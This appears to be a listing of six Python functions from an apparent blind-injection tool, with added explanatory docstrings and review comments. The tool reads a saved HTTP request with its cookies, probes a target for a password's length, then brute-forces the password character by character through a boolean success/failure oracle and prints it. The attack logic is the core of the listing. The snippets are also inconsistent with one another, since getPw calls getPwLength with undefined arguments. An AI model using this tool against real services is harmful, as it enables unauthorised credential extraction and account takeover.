Exemple #1
def getPwLength(connection):
    """Probe for the password length and return it, or -1 if none matched.

    Candidate lengths 1 through 30 are tried in ascending order. For each
    one a payload is built with buildPayloadForLength() and handed to
    requestFailed(); the first candidate for which requestFailed() returns a
    falsy value is taken as the length and probing stops.

    Seen from the server side this is a run of up to 30 consecutive probes
    (presumably differing only in the candidate length), which is the
    pattern a request log or rate limit can key on.

    Args:
        connection: passed through unchanged to requestFailed().

    Returns:
        The first matching length in 1..30, or -1 when every probe failed.
    """
    found = -1
    for candidate in range(1, 31):
        probe = buildPayloadForLength(candidate)
        if requestFailed(probe, connection):
            # This candidate did not match; move on to the next length.
            continue
        chitter.info(" payload: {}".format(probe))
        found = candidate
        break

    print("[+++] password length = {} characters wide.".format(found))
    return found
Exemple #2
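def main():
    """Entry point: print the banner, load the configuration, run one probe.

    Steps, in order: banner and description output, command-line parsing,
    init(), merging the parsed arguments into __gInputParameters__, loading
    the request header file, building __gInclude__ from the request
    parameters, and opening the connection. With __gTestHeader__ set only
    testConnection() runs; otherwise getPwLength() does. The connection is
    closed afterwards even when the probe raises.
    """
    chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    chitter.post("")
    chitter.post("{}".format(__banner__))
    chitter.post("@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@")
    chitter.info(__description__)

    chitter.debug("TEST TEST TEST")

    # argument parser
    parser = argparse.ArgumentParser()
    args = initParser(parser)
    chitter.status("parse input parameters")
    # initialization / read in file with headerfield definitions
    chitter.status("read parameters from requestheader file '{}'".format(
        __gHeaderfieldsFile__))
    init()
    __gInputParameters__.update(handleArgs(args))
    updateHeaders(__gInputParameters__['headerfile'])

    # Carry over every request parameter except the one named by
    # __gXparam__ and those listed in __gExclude__.
    for key, value in __gRequestParameters__.items():
        if key != __gXparam__ and key not in __gExclude__:
            __gInclude__[key] = value

    # Remove excluded names that were already present in __gInclude__.
    # pop() with a default keeps going when a name is absent; the previous
    # try/except around the whole loop stopped at the first missing key and
    # also hid every other kind of error.
    for excluded in __gExclude__:
        __gInclude__.pop(excluded, None)

    connection = connectTarget()
    if connection is None:
        chitter.fatal("Connection could not be established!")
        # NOTE(review): exit status 0 reports success to the calling shell
        # although the run failed; kept unchanged because callers may
        # depend on it.
        exit(0)

    try:
        if __gTestHeader__:
            testConnection(connection)
        else:
            getPwLength(connection)
    finally:
        # Release the connection on the error path as well.
        connection.close()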
Exemple #3
def getPw(connection):
    """Recover the password one character at a time and print it.

    The length is obtained first. Then, for each position 1..length, the
    character codes 32..127 are tried in ascending order: a payload is built
    with buildPayloadForName() and passed to requestFailed(), and the first
    code for which requestFailed() returns a falsy value is appended to the
    result.

    That is at most 96 requestFailed() calls per position, issued one after
    another on the same connection, so a run shows up server-side as a long
    burst of sequential probes.

    Nothing is returned; the result is only printed.
    """
    pw = ""
    c = 32
    # NOTE(review): header, inputParameters and requestParameters are not
    # defined in this function, and the getPwLength() shown in this listing
    # takes a single connection argument; confirm against the full module.
    pwLength = getPwLength(header, inputParameters, requestParameters)
    if pwLength > -1:
        for n in range(1, pwLength + 1):
            c = 32
            for c in range(32, 128):
                payload = buildPayloadForName(chr(c), n)
                if not requestFailed(payload, connection):
                    chitter.info(" payload: {}".format(payload))
                    pw += chr(c)
                    chitter.info(" pw={}".format(pw))
                    break
            # When no code matches at a position nothing is appended, so the
            # final string can be shorter than pwLength.
    else:
        print(
            "[-] Password retrievel failed. Password length could not be determined!"
        )

    # Printed on the failure branch as well, in which case pw is still "".
    print("[+++ FOUND +++] password = {}".format(pw))
Exemple #4
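def updateHeaders(__headerFile__):
    """Load request headers and request parameters from a saved request file.

    Each line is checked against the field names in __gHeaderFields__. On a
    match the text after the field name, minus leading ':', ' ', '|' and '#'
    characters, is stored in __gHeader__. A Cookie value is also passed to
    updateCookies(), and a Host value becomes __gInputParameters__['target'].
    A non-empty line that matches no field is given to readRequestHeader()
    when it contains "GET" or "POST"; otherwise, when the configured method
    is POST, it is given to updateRequestParameters().

    The file therefore decides which host is contacted and which cookies are
    sent. Every matched value, Cookie included, is written to the log
    verbatim, so the log holds the same credentials as the file.

    Any exception is caught and printed; parsing stops at that point.

    Args:
        __headerFile__: path of the request header file to read.
    """
    try:
        with open(__headerFile__, 'r') as hf:
            chitter.info(" -----------------------------------------")
            chitter.info(" header request fields from header file:")
            for line in hf:
                sline = line.strip("\n")
                fieldFound = False
                for k in __gHeaderFields__:
                    # NOTE(review): find() matches the field name anywhere
                    # in the line, not only at its start; confirm that this
                    # is intended.
                    pos = sline.find(k)
                    if pos < 0:
                        continue
                    end = pos + len(k)
                    # Only proceed if the match is not followed by a '-', to
                    # avoid a mixup such as Accept vs. Accept-Encoding. The
                    # character after the actual match is inspected, and the
                    # one-character slice is simply empty when the line ends
                    # right after the field name (indexing raised IndexError
                    # there and aborted the whole file).
                    if sline[end:end + 1] == '-':
                        continue
                    # remove ':', ' ', '|' and '#' from the beginning
                    v = re.sub(r'^[:| #]*', '', sline[end:])
                    __gHeader__.update({k: v})
                    chitter.info("\t {}: {}".format(k, v))
                    if k == 'Cookie':
                        updateCookies(v)
                    fieldFound = True
                    if k == 'Host':
                        __gInputParameters__.update({'target': v})
                    break
                if fieldFound or sline == "":
                    continue
                if sline.find("GET") > -1 or sline.find("POST") > -1:
                    readRequestHeader(line)
                elif __gInputParameters__['method'] == "POST":
                    chitter.info(
                        "\t-----------------------------------------"
                    )
                    chitter.info(
                        "\tPOST request parameters from header file:"
                    )
                    updateRequestParameters(sline, "POST")
    except Exception as e:
        print("[!!!] Error in updateHeaders()!")
        print(e)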
Exemple #5
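def readRequestHeader(line):
    """Parse a request line of the form "METHOD location PROTOCOL".

    For GET the location is split at the first '?': the part before it
    becomes the path and the part after it is passed to
    updateRequestParameters(). For POST the whole location is the path. Any
    other method stores an empty method and an empty path. The result is
    written to __gInputParameters__['method'] and ['path'].

    A line that does not consist of exactly three whitespace-separated
    fields is reported with a warning and otherwise ignored.

    Args:
        line: the raw line from the header file, trailing newline allowed.
    """
    parts = line.split()
    if len(parts) != 3:
        # Unpacking a line with a different field count used to raise
        # ValueError and abort the caller's whole parse.
        chitter.warn("Ignoring malformed request line: {!r}".format(line))
        return
    method, loc, h = parts
    chitter.info("\t[REQUEST] {} {} {}".format(method, loc, h))

    if method == "GET":
        # partition() cuts at the first '?' only, so a query string that
        # itself contains '?' no longer breaks the unpacking.
        path, sep, query = loc.partition("?")
        if sep:
            updateRequestParameters(query, "GET")
        else:
            # assuming path without request parameters
            chitter.warn(
                "Did not find any RequestParameters in provided Header")
    elif method == "POST":
        path = loc
    else:
        # Unsupported method: store empty values. path was left unassigned
        # on this branch before, which raised UnboundLocalError below.
        method = ""
        path = ""
    __gInputParameters__.update({'method': method, 'path': path})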
Exemple #6
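def testConnection(connection):
    """Send the configured request once and log status, headers and body start.

    The request uses the method and path from __gInputParameters__, the
    URL-encoded __gRequestParameters__ and the headers in __gHeader__. Of
    the response, the status line, every header and at most the first 100
    body bytes are logged.

    Response headers are logged verbatim, so any Set-Cookie value the server
    returns ends up in the log; treat that output as sensitive.

    Args:
        connection: object providing request() and getresponse().
    """
    requestParameters = urllib.parse.urlencode(__gRequestParameters__)
    connection.request(__gInputParameters__['method'],
                       __gInputParameters__['path'], requestParameters,
                       __gHeader__)
    resp = connection.getresponse()
    chitter.status("[CONNECTION] {} - {}".format(resp.status, resp.reason))
    # Only the first 100 bytes are read, which keeps the decompression input
    # small. A gzip body longer than that is cut mid-stream and will
    # normally fail to decompress, in which case the raw bytes are shown.
    data = resp.read(100)
    try:
        data_out = gzip.decompress(data)
    except Exception:
        # Not gzip, or a truncated stream. Exception rather than a bare
        # except, so that Ctrl-C and SystemExit are not swallowed here.
        data_out = data
    chitter.info(str(resp.status) + " | " + str(resp.reason))
    chitter.info("RESPONSE HEADERS")
    for key in resp.headers:
        chitter.info("\t" + key + " : " + resp.headers[key])
    chitter.info("BODY:\n\t")
    chitter.info("--------- BODY BEGIN ---------")
    chitter.info(data_out)
    chitter.info("--------- BODY END ---------")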